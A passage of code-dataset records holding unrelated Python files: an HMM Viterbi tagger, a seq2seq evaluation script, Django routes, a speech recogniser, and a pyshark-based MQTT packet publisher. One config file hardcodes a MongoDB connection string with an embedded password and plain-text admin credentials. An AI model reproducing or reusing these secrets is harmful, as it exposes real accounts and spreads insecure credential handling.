self.viterbiTable: \n\t\t\tself.viterbiTable[word] = {last_tag:(tag,probResult)};\n\t\t\n\t\tif last_tag not in self.viterbiTable[word]:\n\t\t\tself.viterbiTable[word][last_tag] = (tag,probResult)\n\n\t\tif probResult > self.viterbiTable[word][last_tag][self.PROBABILITY]:\n\t\t\tself.viterbiTable[word][last_tag] = (tag,probResult)\n\n\n\tdef getViterbiPermute(self, set_of_unique_tag ,testing_words, col_number):\n\t\tprint(\"\")\n\t\tif col_number <= self.ngram+3: # ini yg asli -> # col_number <= self.ngram:\n\t\t\treturn itertools.product(set_of_unique_tag , repeat=col_number)\n\t\telse :\n\t\t\treturn self.getPermuteWithLookMax(set_of_unique_tag, testing_words, col_number)\n\n\t\t## mendapatkan permutasi semua tag max di kolom sebelumnya dengan set_of_unique_tag\n\t\t# contoh: jika sedang menghitung col 2\n\t\t#col 1 | col 2 | col 3 | \t\t\tcoolToLook = word 1\n\t\t#-------------------------- \t\t\n\t\t#word 1 | word 2 | word 3 |\n\t\t#--------------------------\n\t\t# NN | | |\n\t\t# NV | | |\n\t\t# NO | | |\n\t\t# \n\tdef getPermuteWithLookMax(self,set_of_unique_tag, testing_words, col_number):\n\t\tpermutationItem = []\n\t\tprevColKey = testing_words[col_number-2]\n\t\tfor tag in self.viterbiTable[prevColKey]:\n\t\t\tpermutationItem.append(self.viterbiTable[prevColKey][tag][self.TAG_SEQUENCE])\n\t\tpermutationResult = []\n\t\tfor maxTagInPrevCol in permutationItem: # setiap entry max dari setiap kelas di kolom sebelumnya\n\t\t\tfor uniqueTag in set_of_unique_tag: # akan dicross dengan tag unik\n\t\t\t\tresultItem = []\n\t\t\t\tfor ii in list(range(0,col_number-1)): # melakukan unwrap karena di kolom sebelumnya berbentuk tuple\n\t\t\t\t\tresultItem.append(maxTagInPrevCol[ii])\n\t\t\t\tresultItem.append(uniqueTag)\n\t\t\t\tpermutationResult.append(tuple(resultItem))\n\t\treturn permutationResult\n\n\tdef alterIdenticWordNSplit(self,sentence):\n\t\tusedWord=[]\n\t\tfor word in sentence.split(\" \"):\n\t\t\twhile word in usedWord:\n\t\t\t\tword +=\"#\"\n\t\t\tusedWord.append(word)\n\t\treturn usedWord\n\n\tdef printLastResult(self):\n\t\tPROB = 1\n\t\tSEQ = 0\n\t\tlast_max_sequence = []\n\t\tfor column in self.viterbiTable:\n\t\t\tmaxProb = 0\n\t\t\tmaxSequence = []\n\t\t\tfor row in self.viterbiTable[column]:\n\t\t\t\tif self.viterbiTable[column][row][PROB] > maxProb:\n\t\t\t\t\tmaxProb = self.viterbiTable[column][row][PROB]\n\t\t\t\t\tmaxSequence = self.viterbiTable[column][row][SEQ]\n\t\t\tif len(maxSequence) > len(last_max_sequence):\n\t\t\t\tlast_max_sequence = maxSequence\n\t\tprint(\"max sequence : \")\n\t\tpprint.pprint(last_max_sequence)\n\n\n# sen1 = Sentence(Word(\"setiap\",\"XX\"), Word(\"masalah\",\"BD\"), Word(\"ada\",\"XX\"), Word(\"jalan\",\"BD\"), Word(\"keluar\",\"BD\"))\n# sen2 = Sentence(Word(\"tinggi\",\"SF\"), Word(\"gunung\",\"BD\"), Word(\"bisa\",\"XX\"), Word(\"didaki\",\"KR\"))\n# sen3 = Sentence(Word(\"jalan\",\"KR\"), Word(\"kaki\",\"XX\"), Word(\"setiap\",\"XX\"), Word(\"hari\",\"BD\"), Word(\"bisa\",\"XX\"), Word(\"menyembuhkan\",\"KR\"), Word(\"osteoporosis\",\"BD\"))\n# sen4 = Sentence(Word(\"dua\",\"XX\"), Word(\"pebalap\",\"BD\"), Word(\"tinggi\",\"SF\"), Word(\"hati\",\"SF\"), Word(\"itu\",\"XX\"), Word(\"keracunan\",\"KR\"), Word(\"bisa\",\"BD\"))\n# sen5 = Sentence(Word(\"pembangunan\",\"BD\"), Word(\"jalan\",\"BD\"), Word(\"di\",\"XX\"), Word(\"kaki\",\"XX\"), Word(\"gunung\",\"BD\"), Word(\"sudah\",\"XX\"), Word(\"jalan\",\"XX\"), Word(\"dua\",\"XX\"), Word(\"hari\",\"XX\"))\n# sen6 = Sentence(Word(\"jalan\",\"BD\"), Word(\"terjal\",\"SF\"), Word(\"dan\",\"XX\"), Word(\"tanjakan\",\"BD\"), Word(\"tinggi\",\"SF\"), Word(\"bisa\",\"XX\"), Word(\"menjadi\",\"XX\"), Word(\"masalah\",\"BD\"), Word(\"bagi\",\"XX\"), Word(\"setiap\",\"XX\"), Word(\"pebalap\",\"BD\"))\n\nsen1 = Sentence(Word(\"aku\",\"A\"), Word(\"sedang\",\"A\"), Word(\"main\",\"A\"), Word(\"bola\",\"B\"), Word(\"nasi\",\"A\"))\nsen2 = Sentence(Word(\"mereka\",\"B\"), Word(\"sedang\",\"B\"), Word(\"makan\",\"B\"), Word(\"buah\",\"A\"))\nsen3 = Sentence(Word(\"kami\",\"B\"), Word(\"dengan\",\"A\"), Word(\"dia\",\"B\"), Word(\"bersama\",\"A\"))\nsen4 = Sentence(Word(\"makan\",\"A\"), Word(\"sendok\",\"B\"), Word(\"dijual\",\"B\"), Word(\"murah\",\"A\"))\nmodel = HMM_Model(sen1,sen2,sen3,sen4)\n# model = HMM_Model(sen1,sen2,sen3,sen4,sen5,sen6)\n# sen1 = Sentence(Word(\"setiap\",\"N\"), Word(\"masalah\",\"O\"), Word(\"ada\",\"V\"))\n# model = HMM_Model(sen1)\n\nmodel.printSentences()\n\n# print(model.countTagFromAll(\"XX\"))\n# print(model.countTagFromAll(\"XX\",\"setiap\"))\n\n# print(model.countTransitionFromAll([\"XX\",\"BD\"],\"XX\"))\n# print(model.countTransitionFromAll([\"XX\",\"BD\"],\"*\"))\n\n\n# print(model.calculateEmissionProb(\"bisa\",\"BD\"))\n# print(model.calculateTransitionProb([\"XX\",\"BD\"],\"XX\"))\n\n# model.addUnknownWord([sen5,sen6])\nngram = 2 # 2 = bigram\n\nemissionTable = model.generateEmissionTable();\nprint(\"Emission Table : \")\npprint.pprint(emissionTable)\n\n\nmodel.smoothing(emissionTable)\nprint(\"Smoothed Emission Table : \")\npprint.pprint(emissionTable)\n\n\nprint(\"Transition Table : \")\ntransitionTable = model.generateTransitionTable(ngram);\npprint.pprint(transitionTable)\n\nprint(\"Starting Transition Table : \")\nstartingTransitionTable = model.generateStartingTransitionTable(ngram);\npprint.pprint(startingTransitionTable)\n\n\nprint(\"Viterbi Table : \")\nvi = Viterbi(startingTransitionTable, transitionTable,emissionTable,ngram)\n# vi.generateViterbiSequence('pembangunan jalan di kaki gunung sudah jalan dua hari')\n# vi.generateViterbiSequence('jalan terjal dan tanjakan tinggi bisa menjadi masalah bagi setiap pebalap')\n# vi.generateViterbiSequence('tinggi')\nvi.generateViterbiSequence(\"aku makan nasi dengan sendok\")\nprint(\"result : \")\nvi.printLastResult();\n","sub_path":"my_lab/nlp/ws2/hmm-tagger.py","file_name":"hmm-tagger.py","file_ext":"py","file_size_in_byte":13816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"179998924","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals, print_function, division\n\nimport random\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch import optim\nimport torch.nn.functional as F\n\n\nfrom encoder import EncoderRNN\nfrom decoder import *\n\n\nhidden_size = 200 \n#from dataset.translation import * # 这样很不好,要么train之后给save下来\nfrom dataset.snli import *\n\n# get test set\n\n\n\n\n######################################################################\n# Load Model\n# =================\n\n\n\n\n\n######################################################################\n# Plotting results\n# ----------------\n\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg') # 为什么新添加这一行?\nimport matplotlib.ticker as ticker\nimport numpy as np\n\n\n\ndef showPlot(points, points2=None):\n plt.figure()\n fig, ax = plt.subplots()\n # this locator puts ticks at regular intervals\n loc = ticker.MultipleLocator(base=0.2)\n ax.yaxis.set_major_locator(loc)\n plt.plot(points)\n if(points2):\n plt.plot(points2)\n plt.legend(['train-loss', 'test-loss'], loc='upper left')\n plt.savefig('loss.jpg')\n\n\n\ndef evaluate(encoder, decoder, sentence, input_lang, output_lang, max_length=MAX_LENGTH, target_sentence=None, criterion=None):\n if(target_sentence): \n target_tensor = tensorFromSentence(output_lang, target_sentence)\n\n with torch.no_grad():\n input_tensor = tensorFromSentence(input_lang, sentence)\n input_length = input_tensor.size()[0]\n encoder_hidden = encoder.initHidden()\n encoder_outputs = torch.zeros(max_length, encoder.hidden_size, device=device)\n\n for ei in range(input_length):\n encoder_output, encoder_hidden = encoder(input_tensor[ei],\n encoder_hidden)\n encoder_outputs[ei] += encoder_output[0, 0]\n\n decoder_input = torch.tensor([[SOS_token]], device=device) # SOS\n\n decoder_hidden = encoder_hidden\n\n decoded_words = []\n decoder_attentions = torch.zeros(max_length, max_length)\n\n loss = 0\n num_loss = 0\n\n for di in range(max_length):\n decoder_output, decoder_hidden, decoder_attention = decoder(\n decoder_input, decoder_hidden, encoder_outputs)\n decoder_attentions[di] = decoder_attention.data\n topv, topi = decoder_output.data.topk(1)\n\n if(target_sentence and di < len(target_tensor)):\n loss += criterion(decoder_output, target_tensor[di])\n num_loss += 1\n if topi.item() == EOS_token:\n decoded_words.append('')\n break\n else:\n decoded_words.append(output_lang.index2word[topi.item()])\n\n decoder_input = topi.squeeze().detach()\n if(target_sentence):\n return decoded_words, decoder_attentions[:di + 1], loss.item() / num_loss\n else:\n return decoded_words, decoder_attentions[:di + 1]\n\n\n\n######################################################################\n# We can also evaluate on the test set\n\ndef evaluateSet(encoder, decoder, eval_set, input_lang, output_lang, criterion):\n loss_total = 0\n for i in range(len(eval_set)):\n pair = eval_set[i]\n output_words, attentions, loss = evaluate(encoder, decoder, pair[0], \n input_lang, output_lang, target_sentence=pair[1], criterion=criterion)\n loss_total += loss\n return loss_total/len(eval_set)\n\n\n\n\n######################################################################\n# We can evaluate random sentences from the training set and print out the\n# input, target, and output to make some subjective quality judgements:\n#\n\ndef evaluateRandomly(encoder, decoder, eval_set, input_lang, output_lang, n=10):\n for i in range(n):\n pair = random.choice(eval_set)\n print('>', pair[0])\n print('=', pair[1])\n output_words, attentions = evaluate(encoder, decoder, pair[0], input_lang, output_lang)\n output_sentence = ' '.join(output_words)\n print('<', output_sentence)\n print('')\n\n\n\n\n\n######################################################################\n# Visualizing Attention\n# ---------------------\n\ndef showAttention(input_sentence, output_words, attentions):\n # Set up figure with colorbar\n fig = plt.figure()\n ax = fig.add_subplot(111)\n cax = ax.matshow(attentions.numpy(), cmap='bone')\n fig.colorbar(cax)\n\n # Set up axes\n ax.set_xticklabels([''] + input_sentence.split(' ') +\n [''], rotation=90)\n ax.set_yticklabels([''] + output_words)\n\n # Show label at every tick\n ax.xaxis.set_major_locator(ticker.MultipleLocator(1))\n ax.yaxis.set_major_locator(ticker.MultipleLocator(1))\n plt.savefig('attention.jpg')\n #plt.show()\n\n\ndef evaluateAndShowAttention(encoder1, attn_decoder1, input_lang, output_lang, input_sentence, showAttn=True):\n output_words, attentions = evaluate(\n encoder1, attn_decoder1, input_sentence, input_lang, output_lang)\n print('input =', input_sentence)\n print('output =', ' '.join(output_words))\n if showAttn:\n showAttention(input_sentence, output_words, attentions)\n\n\n\n\n\n\n######################################################################\n# Evaluation\n# =======================\n\ndef eval():\n\n # 或者在train.py中import进来\n input_lang = torch.load('model/input_lang')\n output_lang = torch.load('model/output_lang')\n eval_set = torch.load('model/test_set')\n\n encoder1 = EncoderRNN(input_lang.n_words, hidden_size).to(device)\n attn_decoder1 = AttnDecoderRNN(hidden_size, output_lang.n_words, MAX_LENGTH, dropout_p=0.1).to(device)\n\n encoder1.load_state_dict(torch.load('model/encoder'))\n attn_decoder1.load_state_dict(torch.load('model/decoder'))\n\n\n evaluateRandomly(encoder1, attn_decoder1, eval_set, input_lang, output_lang)\n evaluateAndShowAttention(encoder1, attn_decoder1, input_lang, output_lang, random.choice(eval_set)[0])\n\n try:\n while True:\n in_text = input(\"input \" + input_lang.name + \": press ctrl+c to exit\\n\")\n evaluateAndShowAttention(in_text, False)\n except KeyboardInterrupt:\n pass\n\nif __name__ == '__main__':\n eval()\n print(\"Done\")\n#evaluateAndShowAttention(\"elle a cinq ans de moins que moi .\")\n\n#evaluateAndShowAttention(\"elle est trop petit .\")\n\n#evaluateAndShowAttention(\"je ne crains pas de mourir .\")\n\n#evaluateAndShowAttention(\"c est un jeune directeur plein de talent .\")","sub_path":"snli/multitask_snli_eval.py","file_name":"multitask_snli_eval.py","file_ext":"py","file_size_in_byte":6629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"209245379","text":"\"\"\"\n Static variables (consts) to be used in the API (both internally & externally)\n\"\"\"\nSTATE_INFO = {\n 'ACT' : {'region_id' : '01', 'full_name' : 'Australian Capital Territory', 'is_state' : True},\n 'NSW' : {'region_id' : '02', 'full_name' : 'New South Wales', 'is_state' : True},\n 'VIC' : {'region_id' : '03', 'full_name' : 'Victoria', 'is_state' : True},\n 'QLD' : {'region_id' : '04', 'full_name' : 'Queensland', 'is_state' : True},\n 'SA' : {'region_id' : '05', 'full_name' : 'South Australia', 'is_state' : True},\n 'WA' : {'region_id' : '06', 'full_name' : 'Western Australia', 'is_state' : True},\n 'TAS' : {'region_id' : '07', 'full_name' : 'Tasmania', 'is_state' : True},\n 'NT' : {'region_id' : '08', 'full_name' : 'Northern Territory', 'is_state' : True},\n}\nAUS_INFO = {'AUS' : {'region_id' : '00', 'long_name' : 'Australia', 'is_state' : False}}\nREGIONS_INFO = {**AUS_INFO, **STATE_INFO}\n\nSTATE_NAMES = list(STATE_INFO.keys())\nREGION_NAMES = list(REGIONS_INFO.keys())\n\nAGE_BANDS = ['0-4', '5-9', '10-14', '15-19', '20-24', '25-29',\n '30-34', '35-39', '40-44', '45-49', '50-54','55-59', '60-64',\n '65-69', '70-74', '75-79', '80-84', '85 and over']\n\n\nPREDICTION_RANGE = (2019, 3019)\n\nMDB_HOST = \"mongodb://admin:9321admin@ds131763.mlab.com:31763/9321-ass-3\"\nMDB_COL_TOKENS = \"tokens\"\n\nADMIN_USER = 'admin'\nADMIN_PASS = 'admin123'\n","sub_path":"COMP9321-ass-3-master/back_end/static.py","file_name":"static.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"346987972","text":"\n\n#calss header\nclass _GANGRENE():\n\tdef __init__(self,): \n\t\tself.name = \"GANGRENE\"\n\t\tself.definitions = [u\"the decay of a part of a person's body because the blood has stopped flowing there: \"]\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_gangrene.py","file_name":"_gangrene.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"513213801","text":"def newname():\n\tfor i in range(25):\n\t\tyield chr(65+i) + 'a'\n\t\tyield chr(65+i) + 'b'\na = input().split()\nn = int(a[0])\nk = int(a[1])\ns = input().split()\nlast = False\nnew = newname()\nab = next(new)\nlis = [ab]\nremember = ab\n# did not think it through, have to put all the operation at the first index\n# and then replenish the rest at the end\nfor i in s:\n\tif i == \"NO\":\n\t\tif not last:\n\t\t\tlis.append(remember)\n\t\telse:\n\t\t\tlast = False\n\t\t\tlis.append(remember)\n\telif i == \"YES\":\n\t\tif not last:\n\t\t\tfor j in range(k-1):\n\t\t\t\tab = next(new)\n\t\t\t\tlis.append(ab)\n\t\t\t\tremember = ab\n\t\t\t\tlast = True\n\t\telse:\n\t\t\tab = next(new)\n\t\t\tlis.append(ab)\n\t\t\tremember = ab\n\nfor i in range(n - len(lis)):\n\tab = next(new)\n\tlis.append(ab)\nprint(' '.join(lis))","sub_path":"Codeforces/405d2C.py","file_name":"405d2C.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"230426248","text":"import os\nfrom time import gmtime, strftime\nfrom pocketsphinx import LiveSpeech\n\n#dictionary\n'''\nturn on \nturn off\nrecognize face\nis there\nhuman \non the screen\ngo youtube\nhow are you\ncomputer\n'''\n\nclass AcousticModel:\n def __init__(self, model_path, model_hmm_path):\n self.model_path = model_path\n self.model_hmm_path = model_hmm_path\n\n self.SAMPLING_RATE = 16000\n self.BUFFER_SIZE = 2048\n\n config = LiveSpeech(\n verbose=False,\n sampling_rate=16000,\n buffer_size=2048,\n no_search=False,\n full_utt=False,\n hmm=os.path.join(model_hmm_path, 'en-us'),\n lm=os.path.join(model_path, '6856.lm'),\n dic=os.path.join(model_path, '6856.dic')\n )\n self.SPEECH = config\n self.words = []\n\n def run(self):\n print(\"Mice is listening...\\n\")\n for phrase in self.SPEECH:\n cur_time = strftime(\"%Y-%m-%d %H:%M:%S\", gmtime())\n split = [word for word in str(phrase).split()]\n record = (cur_time, split)\n self.words.append(record)\n print(\"\\nYou said:\" + str(phrase))\n print(\"All words in session: \" + str(self.words))\n\n\ndef main():\n model_hmm_path = \"/home/pawel/sphinxCMU/pocketsphinx/model/en-us\"\n model_path = \"/home/pawel/Desktop/acoustic model/\"\n model = AcousticModel(model_path, model_hmm_path)\n model.run()\n\n \nif __name__ == \"__main__\":\n main()\n","sub_path":"pocket_sphinx(speech rec)/acoustic_model_2.py","file_name":"acoustic_model_2.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"643240643","text":"from django.conf.urls import url\n# from .view_basic import *\nfrom api.view_api import *\nfrom api.view_project_and_group import *\nfrom api.view_case import *\nfrom api.view_send_req import *\nfrom api.view_test_report import *\nfrom api.view_other_fun import *\nfrom api.view_global_env import *\nfrom api.view_test_task import *\nfrom api.view_report_receive_config import *\nfrom api.reprot_form import get_report_form_list, rf_verify, get_rf_result_list, get_rf_result_detail\n\n\nurlpatterns = [\n # 自测用的接口\n url(r\"^test\", test),\n\n # 项目部分\n url(r'^get_all_project$', get_all_project), # 取所有项目数据\n url(r\"^add_project$\", add_project),\n url(r\"^delete_project$\", delete_project),\n url(r\"^update_project$\", update_project),\n\n # 分组部分\n url(r'^get_all_group$', get_all_group), # 获取某项目下所有分组数据\n url(r\"^add_group$\", add_group),\n url(r\"^delete_group$\", delete_group),\n url(r\"^update_group$\", update_group),\n\n # 接口部分部分\n url(r'^get_api_list$', get_api_list),\n url(r\"^add_api$\", add_api),\n url(r\"^delete_api$\", delete_api),\n url(r\"^update_api$\", update_api),\n\n # 用例部分\n url(r\"^get_case_data$\", get_case_data), # 获取某个case的数据\n url(r\"^get_case_list$\", get_case_list), # 获取某个接口下的所有用例\n url(r\"^save_case$\", save_case),\n url(r\"^delete_case$\", delete_case),\n url(r\"^update_case$\", update_case),\n\n # 全局配置\n url(r'^get_global_host$', get_global_host),\n url(r'^get_global_variable$', get_global_variable),\n url(r'^get_global_header$', get_global_header),\n url(r'^get_global_cookie$', get_global_cookie),\n url(r'^get_global_env$', get_global_env),\n\n # 接收报告配置\n url(r'^get_workwx_user_group', get_workwx_user_group),\n url(r'^get_workwx_group_chat', get_workwx_group_chat),\n url(r'^get_email_user_group', get_email_user_group),\n\n # 页面接口请求\n url(r'^send_req$', send_req),\n\n # 其他功能部分\n url(r\"^switch_json$\", switch_json), # kv格式转换成json格式\n url(r\"^switch_kv$\", switch_kv), # json格式转换成kv格式\n url(r\"^F12_p_to_json$\", F12_p_to_json), # F12的请求参数转换json\n url(r\"^excel_json_auto_switch$\", excel_json_auto_switch), # excel格式和json格式智能转换\n url(r\"^add_sign\", add_sign), # 添加当前时间戳\n\n # 测试任务\n url(r\"^get_test_task_list$\", get_test_task_list),\n url(r\"^get_test_task_detail\", get_test_task_detail),\n url(r\"^add_test_task$\", add_test_task),\n url(r\"^update_test_task$\", update_test_task),\n url(r\"^delete_test_task$\", delete_test_task),\n url(r\"^execute_task_now$\", execute_task_now),\n # url(r\"^start_cron_program$\", start_cron_program),\n # url(r\"^pause_cron_program$\", pause_cron_program),\n # url(r\"^resume_cron_program$\", resume_cron_program),\n # url(r\"^stop_cron_program$\", stop_cron_program),\n url(r\"^start_cron_task$\", start_cron_task), # 开始定时任务\n url(r\"^stop_cron_task$\", stop_cron_task), # 停止定时任务\n url(r\"^get_cron_info$\", get_cron_info), # 获取指定任务或所有任务的下��执行时间\n\n # 测试任务组\n url(r\"^get_task_group_list$\", get_task_group_list),\n url(r\"^get_task_group_detail\", get_task_group_detail),\n url(r\"^add_task_group$\", add_task_group),\n url(r\"^update_task_group$\", update_task_group),\n url(r\"^delete_task_group$\", delete_task_group),\n url(r\"^execute_task_group_now$\", execute_task_group_now),\n url(r\"^start_cron_task_group$\", start_cron_task_group),\n url(r\"^stop_cron_task_group$\", stop_cron_task_group),\n\n # 测试报告\n url(r\"^get_report_list$\", get_report_list),\n url(r\"^get_report_data$\", get_report_data),\n url(r\"^get_case_detail$\", get_case_detail), # 获取用例详情数据,全量测试情况下\n url(r\"^get_all_report$\", get_all_report), # 获取全部报告数据\n\n # 统计部分\n url(r\"^staticitem_project$\", staticitem_project), # 按项目统计\n url(r\"^staticitem_task$\", staticitem_task), # 按任务统计\n url(r\"^staticitem_recent$\", staticitem_recent), # 按最近执行情况统计\n url(r\"^staticitem_user$\", staticitem_user), # 按用户统计(最近七周每人新增用例数量\n url(r\"^staticitem_user2$\", staticitem_user2), # 按用户统计(每个人新增的全部用例数量\n\n # 报表自动化\n url(r\"^get_report_form_list$\", get_report_form_list),\n url(r\"^get_rf_result_list$\", get_rf_result_list),\n url(r\"^get_rf_result_detail$\", get_rf_result_detail),\n url(r\"^rf_verify$\", rf_verify), # 测试单个报表\n\n url(r\"^upload_case$\", upload_case), # 上传用例\n # 下载接口用例数据 dl_api_case_data:数据处理判断,结果为true通过触发a标签直接请求文件\n url(r\"^dl_api$\", dl_api),\n url(r\"^download_group$\", download_group),\n\n url(r\"^download/(.*)\", download), # 下载文件\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"113654450","text":"'''\r\nCreated on 07.10.2016\r\n\r\n@author: ThinkPad User\r\n'''\r\n\r\nimport paho.mqtt.client as mqtt\r\nimport ConfigParser\r\nimport datetime\r\nimport pyshark\r\nimport extract_data\r\nimport logging\r\nimport time\r\nimport sys\r\n\r\nclass MqttHandler(object):\r\n def __init__(self, iniFilePath):\r\n self.logger = logging.getLogger()\r\n self.logger.info(\"MqttHandler::__init__: Got iniFilePath=\" + repr(iniFilePath))\r\n #ini file parsing\r\n conf = ConfigParser.ConfigParser()\r\n conf.read(iniFilePath)\r\n self.conf = conf\r\n self.logger.info(\"MqttHandler::__init__: Config read done\")\r\n \r\n #Connect to the capture program\r\n self.interfaceString = str(self.conf.get(\"Capture\",\"Interface\")).strip()\r\n self.bpfFilterString = \"ip host \" + str(self.conf.get(\"Capture\",\"ListenIp\")).strip()\r\n self.logger.info(\"MqttHandler::__init__: Listening on interface '\" + self.interfaceString + \"'\")\r\n self.logger.info(\"MqttHandler::__init__: Using bpf_filter string '\" + self.bpfFilterString + \"'\")\r\n# self.capture = pyshark.LiveCapture(self.interfaceString, bpf_filter=self.bpfFilterString)\r\n #TODO: If the line above is used it does obviously not work, why???\r\n self.capture = pyshark.LiveCapture(\"eth0\", bpf_filter=\"ip host 192.168.0.196\")\r\n self.logger.info(\"MqttHandler::__init__: Capture object init done\")\r\n\r\n #mqtt stuff\r\n self.mqtt_client = mqtt.Client()\r\n #client callback setup for incoming data\r\n self.mqtt_client.on_connect = self.__on_connect__\r\n self.mqtt_client.on_message = self.__on_message__\r\n self.mqtt_client.on_disconnect = self.__on_disconnect__\r\n self.logger.info(\"MqttHandler::__init__: Basic MQTT client setup done\")\r\n #finally connect the client\r\n try:\r\n user = conf.get(\"Mqtt\",\"Username\")\r\n passw = conf.get(\"Mqtt\",\"Password\")\r\n self.mqtt_client.username_pw_set(user, passw)\r\n self.logger.info(\"MqttHandler::__init__: MQTT client auth data setup done\")\r\n except:\r\n self.logger.info(\"MqttHandler::__init__: Error in MQTT client auth data setup has occured\")\r\n pass\r\n self.mqtt_connected = False\r\n self.logger.info(\"MqttHandler::__init__: Starting MQTT client connect\")\r\n self.mqtt_client.connect(host=conf.get(\"Mqtt\",\"Host\"), \r\n port=int(conf.get(\"Mqtt\",\"Port\")), \r\n keepalive=int(conf.get(\"Mqtt\",\"KeepAliveTime\")))\r\n self.logger.info(\"MqttHandler::__init__: MQTT client connection is established\")\r\n #Start a background thread that handles the data\r\n self.mqtt_client.loop_start()\r\n self.logger.info(\"MqttHandler::__init__: MQTT worker thread is started\")\r\n self.lastPublishTime = datetime.datetime.now()\r\n self.logger.info(\"MqttHandler::__init__: __init__ done completely\")\r\n \r\n def __on_connect__(self, client, userdata, flags, rc):\r\n #set up the subscriptions here but check the result code (rc argument) first\r\n self.logger.info(\"MqttHandler::__on_connect__: got request with rc=\" + repr(rc))\r\n if rc != 0:\r\n self.logger.info(\"Got code \" + repr(rc) + \"after trying to establish a connection\")\r\n self.mqtt_connected = False\r\n else:\r\n self.mqtt_connected = True\r\n \r\n def __on_disconnect__(self):\r\n #Stop the loop\r\n self.mqtt_client.loop_stop()\r\n self.logger.info(\"MqttHandler::__on_disconnect__: Got disconnected from MQTT server...\")\r\n time.sleep(5)\r\n sys.exit(1)\r\n \r\n def __on_message__(self, client, userdata, message):\r\n pass\r\n \r\n def __on_packet__(self, packet):\r\n #first try to print basic information about each packet to the log\r\n self.logger.info(\"MqttHandler::__on_packet__: Packet received from\")\r\n try:\r\n self.logger.info(repr(packet.ip.host) + \" to \" + repr(packet.ip.dst))\r\n except:\r\n self.logger.info(\"error in retrieving ip infos from packet\")\r\n #after that we need to extract the destination port as we are only interested in packets to a certain port\r\n try:\r\n dstport = packet.udp.dstport\r\n dstport = int(dstport)\r\n except:\r\n self.logger.info(\"MqttHandler::__on_packet__: Unable to get destination port from UDP packet\")\r\n return\r\n #check if this packet is interesting for us\r\n if dstport == 22460:\r\n #yes it is!\r\n self.logger.info(\"MqttHandler::__on_packet__: Packet for port 22460 detected, processing it now\")\r\n #extract the data values from the raw data\r\n data = extract_data.extract_data(packet.data.data)\r\n if not self.mqtt_connected:\r\n self.logger.info(\"MqttHandler::__on_packet__: MQTT client not connected, returning now\")\r\n return\r\n #time to publish...\r\n self.lastPublishTime = datetime.datetime.now()\r\n defaultQos = 1 #deliver at least once\r\n UrlBase = (self.conf.get(\"Mqtt\",\"UrlBase\")).strip()\r\n if UrlBase[-1] == \"/\":\r\n UrlBase = UrlBase[:-1]\r\n #Publish messages here\r\n for key in data:\r\n self.logger.info(\"MqttHandler::__on_packet__: Publishing data '\" + repr(data[key]) + \"' to \" + UrlBase+\"/\"+str(key))\r\n self.mqtt_client.publish(topic=UrlBase+\"/\"+str(key), payload=data[key], qos=defaultQos, retain=False)\r\n if len(data):\r\n self.mqtt_client.publish(topic=UrlBase+\"/lastRefresh\", payload=repr(self.lastPublishTime), qos=defaultQos, retain=False)\r\n self.logger.info(\"MqttHandler::__on_packet__: Packet processing done\")\r\n \r\n def loop(self):\r\n #in this function all outgoing traffic (publish events) are generated\r\n #this function MUST be called once from the main program!!\r\n #alternativly it can be called in regular intervals but it does normally not return from the first call\r\n self.logger.info(\"MqttHandler::loop: Begin\")\r\n if self.capture == None:\r\n self.capture = pyshark.LiveCapture(self.interfaceString, bpf_filter=self.bpfFilterString)\r\n for packet in self.capture:\r\n self.logger.info(\"MqttHandler::loop: Packet received\")\r\n self.__on_packet__(packet)\r\n self.logger.info(\"MqttHandler::loop: End\")\r\n self.capture = None\r\n time.sleep(5)\r\n sys.exit(1)\r\n \r\n def __del__(self):\r\n try:\r\n self.mqtt_client.loop_stop()\r\n except:\r\n pass\r\n \r\ndef innerLoop(iniFile):\r\n logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.INFO)\r\n logger = logging.getLogger()\r\n m = MqttHandler(iniFile)\r\n logger.info(\"MqttHandler object successfully created, starting loop\")\r\n m.loop()\r\n #normally loop doesn't exit except there is an error. If there is an error\r\n #we get to the next line and exit with an error code that indicates the error\r\n sys.exit(1)\r\n \r\nif __name__ == \"__main__\":\r\n innerLoop(\"conf.ini\")\r\n ","sub_path":"src/mqtt_handler.py","file_name":"mqtt_handler.py","file_ext":"py","file_size_in_byte":7214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"69149023","text":"from app.main.db import get_db\nfrom app.main.util.dto import TaskDto\n\nfrom datetime import datetime, timedelta\n\napi = TaskDto.api\n\ndef mk_date(date_str):\n return datetime.date(datetime.strptime(date_str, '%Y-%m-%d'))\n\nclass Task:\n def __init__(self, uid):\n self.uid = uid\n self.title = None\n self.description = None\n self.due_date = None\n self.status = None\n\n @classmethod\n def from_payload(cls, payload):\n task = cls(None)\n task.title = payload['title']\n task.description = payload['description']\n task.due_date = mk_date(payload['due_date'])\n task.status = payload['status']\n\n return task\n\n @classmethod\n def from_sql_row(cls, row):\n task = cls(row['id'])\n task.title = row['title']\n task.status = row['status']\n task.due_date = row['due_date']\n task.description = row['description']\n\n return task\n\n def fetch_info(self):\n db = get_db()\n task = db.execute(\n 'SELECT * FROM task WHERE id = ?', (self.uid,)\n ).fetchone()\n if not task:\n return False\n self.title = task['title']\n self.description = task['description']\n self.due_date = task['due_date']\n 